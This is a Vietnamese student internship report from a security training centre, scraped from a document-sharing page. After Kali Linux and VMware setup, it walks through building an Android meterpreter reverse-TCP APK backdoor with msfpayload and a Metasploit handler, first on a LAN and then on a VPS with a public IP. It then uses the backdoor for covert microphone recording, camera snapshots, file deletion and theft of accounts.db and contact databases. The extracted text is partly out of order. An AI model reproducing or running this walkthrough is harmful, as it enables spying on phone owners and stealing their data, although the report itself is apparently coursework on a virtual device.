phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được 
các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to- 
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của 
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ 
thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay 
đổi mã nguồn của các công cụ. 
Tính tương thích kiến trúc 
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến 
trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có 
thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. 
Hỗ trợ mạng không dây tốt hơn 
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là 
sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB 
Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng 
không dây. 
Khả năng tùy biến cao 
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với 
giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, 
KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. 
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai 
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều 
hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta 
đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). 
21 
BackTrack, Kali có rất nhiều cải tiến: 
date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã 
dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không 
phải cài lại mới hoàn toàn nữa. 
3) Cài đặt Vmware và cài đặt Kali trên Vmware 
Cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến 
hành cài phiên bản Kali Linux 1.0.9 64 bit ( Khuyến cao nên dùng phiên bản Kali linux 
1.0.9 32 bit, vì bản này thông dụng, phiên bản metasploit framework nhiều hơn bản 64 
Bạn là 1 kỹ sư công nghệ thông tin, thì không nhiều thì ít các bạn cũng có sử dụng 
qua công cụ tạo máy ảo, mình sẽ giới thiệu phần mềm VMware. VMware Workstation là 
một phần mềm tạo máy ảo hàng đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy 
Windows, Linux, Mac OS hay thậm chí là Android nữa. VMware Workstation 10 là một 
phần mềm giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính 
năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo. 
22 
bit). http://ww.kalwi.org/downloads/ 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Để download được Vmware ta có thể download từ nhiều trang khác nhau, ta vào 
https://www.google.com.vn/ và gõ Vmware 10 thì sẽ search được rất nhiều địa chỉ để ta 
download. 
Từ giao diện chính của VMware thì nhấn vào File -> New Vitual Machine (hoặc 
dùng phím tắt Ctrl + N). 
23 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
24 
Chọn Custom và nhấn next. 
Tại bước này ta chọn installer và chọn đĩa iso kali cần cài đặt làm máy ảo 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
25 
Chọn tên và chỗ lưu máy ảo 
Tiếp tục nhấn next, next và chọn thanh ram cho máy ảo 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
26 
Tiếp tục ta chọn Use Bridge networking->next 
Ta chọn LSI logic->next 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
27 
Ta chọn SCSI->next 
Ta chọn Create a new virtual disk->next 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Sau khi nhấn Finish thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt. Tùy vào ổ cứng ram 
mà ta chọn cho máy ảo thì sẽ cài đặ nhanh hoặc chậm 
28 
Tiếp tục nhấn next ,ta chọn dung lượng ổ cứng cho Máy Kali 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Nếu máy tính bạn gặp trường hợp này thì hãy kiểm tra theo từng bước của lỗi.Trường hợp 
này, máy tính chưa bật chức năng ảo hóa trong Bios, cách xử lí trường hợp này bằng cách, 
restars máy tính => bấm F2 liên tục để vào Bios tìm mục Advance rồi chỉnh enable intel 
VT.Khởi động lại và tiếp tục mở Vmware để cài đặt. 
Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt 
là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install 
29 
. 
Nếu máy tính bạn không gặp trường hợp này thì tiếp tục và cài đặt bình thường. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
30 
Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue 
Chọn nước 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng. 
31 
set Hostname 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
32 
set password user root 
Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali. 
Partition disks (Step 1) 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
33 
Partition disks (Step 2) 
Partition disks (Step 3) 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
34 
Partition disks (Step 4) 
Partition disks (Step 5) 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
35 
Partition disks (Step 6) 
Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Cài đặt hệ thống 
Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các ứng 
dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú ý: Nếu bạn 
chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của 
Kali. 
36 
Tiếp đến là cài đặt GRUB 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
37 
Cuối cùng, nhấp vào Continue để khởi động lại Kali 
Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
38 
Giao diện sau khi cài đặt xong Hệ điều hành Kali linux 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy 
android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy 
ảo Kali Linux bằng Vmware. 
msfpayload android/meterpreter/reverse_tcp lhost=192.168.29.129 lport=8080 
Xem địa chỉ máy ip kali bằng cách mở 1 terminal mới và nhập lệnh “ifconfig” và ta 
Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus 
Câu lệnh giúp ta tạo ra 1 phần mềm độc hại tích hợp trên file.apk giúp ta mở ra kết 
nối với victim (backdoor), nhiệm vụ của haker là gửi cho vicim “files.apk” này, khi victim 
vô tình tải về “file.apk” ta sẽ có 1 phiên kết nối ngược gửi về địa chỉ host của máy kali : 
192.168.29.129 thông qua port 8080 (port websever) 
39 
Phần 1: Làm trên mạng local Lan 
1.Tạo mã độc trên Kali Linux 
Đầu tiên mở 1 terminal và gõ dòng lệnh: 
R > /root/Desktop/files.apk 
sẽ nhận được 1 địa chỉ ip:192.168.29.129 
máy tính để thực thi mã độc. 
Tiếp theo, gõ lệnh msfconsole 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách 
40 
gõ lệnh sau: 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set lhost 192.168.29.129 – [nhập địa chỉ IP giống với khi tạo payload ở trên]. 
set lport 8080 – [nhập port giống với port khi tạo payload ở trên]. 
Exploit 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Phần 4 ta đã tạo ra 1 file app.apk chứa mã độc, ta sẽ tung lên mạng, và dùng đt ảo 
tải file app.apk về. 
Để cài đặt được app này thì bạn phải check vào ô “Unknown sources” –cho phép 
cài đặt tất cả các app không rõ nguồn gốc. 
41 
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor. 
2.Đưa mã độc vào thiết bị android 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Cài đặt files.apk, và mở lên được giao diện như dưới, nhấp vào nút “ReverseTCP ”: 
42 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Khi ta nhấp vào ReverseTcp thì lập tức backdoor sẽ mở ra và ta có 1 phiên kết nối 
với victim. 
43 
 Sử dụng lệnh help. 
 Sử dụng l ệnh Record_mic: 
Lưu file ghi âm về máy trong thư mục root 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
File hình đã chụp từ camera của máy android là vEYWFBxp.jpeg được lưu ở thư 
44 
 Sử dụng l ệnh Webcam_snap 1 để chụp hình 
mục root của máy. 
 Sử dụng l ệnh Webcam_stream 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Dùng lệnh cd /sdcard/Download để vào thư mục và dùng lệnh ls đề liệt kê ra các 
file có trong thư mục Download. 
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download 
45 
 Sử dụng l ệnh Sysinfo: 
3.Xâm nhập SD card của thiết bị android 
Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard 
App.apk. Và file này sẽ được tải về thư mục /root của máy Kali. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật 
lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có 
hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 
1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. 
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn 
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% 
khả năng bị hack local. 
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài 
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến 
các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì 
mọi tài khoản khác trên VPS đều hoạt động bình thường. 
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, 
nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử 
dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…. 
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung 
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng 
khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt 
Web trên VPS, dowload/upload bittorrent với tốc độ cao… 
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà 
46 
Phần 2: Làm trên môi trường VPS 
1. Giới thiệu về VPS 
Định nghĩa 
Đặc điểm về thông số VPS 
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. 
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. 
không cần phải khởi động lại hệ thống. 
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 
Giá trị khi sử dụng VPS 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù 
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, 
tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng 
đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit 
có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, Mac OS. 
47 
hợp. 
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. 
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. 
Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. 
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. 
2. Cài đặt mã độc trên VPS 
Giới thi ệu 
Cài đặt Metasploit Framework 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
48 
Các bước tiếp theo ta thực hiện Step-by-Step là được: 
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
49 
Chọn server và ngày hết hạn, để mặc định: 
Quá trình cài đặt của Metasploit: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
50 
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình: 
Sau khi Finish trình duyệt web mở lên và đi tới giao diện 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào 
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi 
chọn Create Account: 
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn 
51 
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
 Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên mang 
52 
Giao diện chương trình Metasploit Console 
3. Từ VPS xâm nhập vào thiết bị Android 
a. Các bước thực hiện 
LAN với địa chỉ IP là địa chỉ của VPS 
Chúng ta vẫn sử dụng lệnh: 
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R > 
/root/Desktop/files.apk 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác là sử 
dụng chính IP của VPS 
53 
Ở đây địa chỉ VPS là 14.0.21.162 
 Khởi động Metasploit Console trên VPS 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
b.Tấn công điện thoại Android: 
Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài 
chục phút. 
Tiến hành thiết đặt payload bằng các lệnh 
 “ use exploit/multi/handler ” 
 “ set payload android/meterpreter/reverse_tcp ” 
 “ set lhost 14.0.21.162 ” 
 “ set lport 4444 ” 
 “show options” 
 “ run ” 
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở 
Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android 
nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông 
báo như sau: 
54 
trên. 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
55 
Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác 
Ghi âm lén: 
Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 
Sử dụng camera: 
Xem danh sách webcam của thiết bị: “ webcam_list ” 
Chụp ảnh lén: “webcam_snap <mã camera>” 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể 
tiếp tục tấn công. 
56 
Tải và xóa file bất kỳ từ bộ nhớ sdcard: 
Di chuyển vào thư mục bằng lệnh: cd 
Tải về bằng lệnh: download <tên file> 
Xóa tập tin bằng lệnh: rm <tên file> 
Truy cập trực ti ếp vào hệ thống: 
Truy cập vào hệ thống bằng lệnh: “shell ” > “su” 
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ” 
Truy cập và khai thác tài khoản người dùng: 
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” 
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard” 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
57 
Trở về meterpreter (Nhấp Ctrl+C) và tải file accounts.db về: 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
58 
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db 
Truy cập và đánh cắp danh bạ điện thoại: 
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: 
“cd /data/data/com.android.providers.contacts/databases” 
Copy về thẻ sdcard và tải về máy 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
59 
Xem nội dung của contacts2.db bằng SQLite Manager 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
60 
Một số câu l ệnh khác: 
- Để biết thêm về các lệnh có thể thực hiện ta dùng help 
- Để xem thông tin về máy, nhập lệnh sysinfo 
- Để xem các tác vụ đang chạy gõ ps 
- Xem ip của máy bị hack ta gõ ipconfig 
- Xem danh sách thư mục, file gõ ls 
- Để upload gõ lệnh upload 
- ls -l danh mục file và các quyền 
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
61 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
- Để xem danh sách và down load các file hay thay đổi các file trong ROM 
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
Ctrl + C để quay lại 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
- VỆ SINH MÁY TÍNH 
- SỬA LỖI DISK 100% 
- SỬA LỖI RAM CHẠY Ì ẠCH, KHIẾN MÁY BỊ TẮT KHI DÙNG VMWARE, 
Những kinh nghiệm thực tiễn đã tích lũy được: 
Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, 
thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới 
bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh 
nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua 
các kĩ năng giao tiếp và ứng xử. 
62 
C.KẾT QUẢ 
NHỮNG VIỆC ĐÃ LÀM ĐƯỢC 
2 MÁY ẢO ANDROID, MÁY QUAY PHIM BB 
- KHẮC PHỤC LỖI DÙNG VPS TẤN CÔNG MÁY ANDROID KHÔNG 
THÀNH CÔNG DO PHIÊN BẢN METASPLOIT CŨ 
Những kiến thức lý thuyết đã được củng cố: 
 Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android 
 Tìm hiểu về hệ điều hành Kali Linux 
 Tìm hiểu về các lỗ hổng bảo mật của Windows và Android 
 Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng 
Những kỹ năng thực hành đã được học thêm: 
 Thực hiện cài đặt Android trên máy ảo 
 Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của 
Windows và Android 
 Thi lấy chứng chỉ System Hacking của trung tâm Athena 
 Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào 
Android 
 Biết thêm về một số bài học trong lớp Hacker mũ trắng 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
http://www.quantrimang.com.vn/lo-hong-bao-mat-nghiem-trong-de-doa-82-may-android- 
110510 
63 
D .DANH SÁCH CÁC CLIP: 
- Clip giới thiệu về bản thân và trung tâm Athena: 
https://www.youtube.com/watch?v=N501TeA2E4g 
- Clip khó khăn thuận lợi: https://www.youtube.com/watch?v=RPk9iQ_RnPY 
- Cài Vmware: https://www.youtube.com/watch?v=pZ-e7k87pdk 
- Cài Kali Linux: https://www.youtube.com/watch?v=P0qA276m754 
- Cài Genymotion android ảo: https://www.youtube.com/watch?v=wcRlmx2JNxQ 
- Tạo mã độc trên Kali linux xâm nhập android ảo đánh cắp dữ liệu: 
https://www.youtube.com/watch?v=HnW2rjVUx04 
- Cài đặt phần mềm chứa mã độc icalendar 
https://www.youtube.com/watch?v=0mdCkXwMnEc 
- Tạo mã độc trên VPS cho phép đánh cắp dữ liệu android 
https://www.youtube.com/watch?v=_JUgsUfIvIU 
E. PHỤ LỤC : TRÍCH DẪN NGUỒN 
THAM KHẢO 
http://sinhvienit.net/forum 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
64 
http://forum.bkav.com.vn 
http://developer.android.com/sdk/index.html#download 
http://www.oracle.com/technetwork/java/javase/downloads 
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086

More Related Content

What's hot

Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
Hường Tô
 
Baocao pham nguyendanghoang
Baocao pham nguyendanghoangBaocao pham nguyendanghoang
Baocao pham nguyendanghoang
Hoàng Phạm
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctap
Thu Hien
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gk
ice_eyes
 
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Đàm Văn Sáng
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gk
ice_eyes
 

What's hot (15)

Báo cáo cuối kì
Báo cáo cuối kì Báo cáo cuối kì
Báo cáo cuối kì
 
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
 
Baocao pham nguyendanghoang
Baocao pham nguyendanghoangBaocao pham nguyendanghoang
Baocao pham nguyendanghoang
 
Báo cáo TTTN lập trình S7300 và hệ thống SCADA
Báo cáo TTTN lập trình S7300 và hệ thống SCADABáo cáo TTTN lập trình S7300 và hệ thống SCADA
Báo cáo TTTN lập trình S7300 và hệ thống SCADA
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctap
 
Bao cao gk
Bao cao gkBao cao gk
Bao cao gk
 
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
 
Bao cao thuc tap gk
Bao cao thuc tap gkBao cao thuc tap gk
Bao cao thuc tap gk
 
Báo cáo thực tập ATHENA
Báo cáo thực tập ATHENA Báo cáo thực tập ATHENA
Báo cáo thực tập ATHENA
 
NGHIEN CUU VA TRIEN KHAI VPN
NGHIEN CUU VA TRIEN KHAI VPN NGHIEN CUU VA TRIEN KHAI VPN
NGHIEN CUU VA TRIEN KHAI VPN
 
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Đề tài: Xây dựng hệ thống thi trắc nghiệm qua mạng LAN, 9đ
Đề tài: Xây dựng hệ thống thi trắc nghiệm qua mạng LAN, 9đĐề tài: Xây dựng hệ thống thi trắc nghiệm qua mạng LAN, 9đ
Đề tài: Xây dựng hệ thống thi trắc nghiệm qua mạng LAN, 9đ
 
Bao caothuctap nguyenthanhlam
Bao caothuctap nguyenthanhlamBao caothuctap nguyenthanhlam
Bao caothuctap nguyenthanhlam
 

Similar to Thực tập

đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minh
Loc Tran
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
Steven Nguyễn
 
Bao cao cuoi ki [Athena]
Bao cao cuoi ki [Athena]Bao cao cuoi ki [Athena]
Bao cao cuoi ki [Athena]
thach28
 
[Athena]Bao cao cuoi ki
[Athena]Bao cao cuoi ki[Athena]Bao cao cuoi ki
[Athena]Bao cao cuoi ki
thach28
 
Bao cao cuoi ki
Bao cao cuoi kiBao cao cuoi ki
Bao cao cuoi ki
thach28
 
Luan van le thi dieu hien
Luan van   le thi dieu hienLuan van   le thi dieu hien
Luan van le thi dieu hien
vinhlmd
 
Bao cao thuc tap tran nguyen bao khanh
Bao cao thuc tap  tran nguyen bao khanhBao cao thuc tap  tran nguyen bao khanh
Bao cao thuc tap tran nguyen bao khanh
Lan Nguyễn
 
baocaonguyenduykhanh
baocaonguyenduykhanhbaocaonguyenduykhanh
baocaonguyenduykhanh
vanphu2103
 
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008nghiên cứu và triển khai các dịch vụ mạng windows server 2008
nghiên cứu và triển khai các dịch vụ mạng windows server 2008
Khanh Dinh
 

Similar to Thực tập (20)

đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minh
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
 
Báo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaBáo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam Athena
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Bao cao cuoi ki [Athena]
Bao cao cuoi ki [Athena]Bao cao cuoi ki [Athena]
Bao cao cuoi ki [Athena]
 
[Athena]Bao cao cuoi ki
[Athena]Bao cao cuoi ki[Athena]Bao cao cuoi ki
[Athena]Bao cao cuoi ki
 
Bao cao cuoi ki
Bao cao cuoi kiBao cao cuoi ki
Bao cao cuoi ki
 
Đề Tài Khóa luận 2024 Một số giải pháp nhằm nâng cao chất lượng dịch vụ chăm ...
Đề Tài Khóa luận 2024 Một số giải pháp nhằm nâng cao chất lượng dịch vụ chăm ...Đề Tài Khóa luận 2024 Một số giải pháp nhằm nâng cao chất lượng dịch vụ chăm ...
Đề Tài Khóa luận 2024 Một số giải pháp nhằm nâng cao chất lượng dịch vụ chăm ...
 
Khóa luận: Biện pháp nhằm hoàn thiện hoạt động quan hệ công chúng của Công ty...
Khóa luận: Biện pháp nhằm hoàn thiện hoạt động quan hệ công chúng của Công ty...Khóa luận: Biện pháp nhằm hoàn thiện hoạt động quan hệ công chúng của Công ty...
Khóa luận: Biện pháp nhằm hoàn thiện hoạt động quan hệ công chúng của Công ty...
 
Luan van le thi dieu hien
Luan van   le thi dieu hienLuan van   le thi dieu hien
Luan van le thi dieu hien
 
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên AndroidBáo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
Báo Cáo Đề Tài Xây Dựng Phần Mềm Quản Lí Khách Hàng Trên Android
 
Báo Cáo Cuối kỳ CNTT ATHENA
Báo Cáo Cuối kỳ CNTT ATHENABáo Cáo Cuối kỳ CNTT ATHENA
Báo Cáo Cuối kỳ CNTT ATHENA
 
Bao cao thuc tap tran nguyen bao khanh
Bao cao thuc tap  tran nguyen bao khanhBao cao thuc tap  tran nguyen bao khanh
Bao cao thuc tap tran nguyen bao khanh
 
Baocaothuctapv1
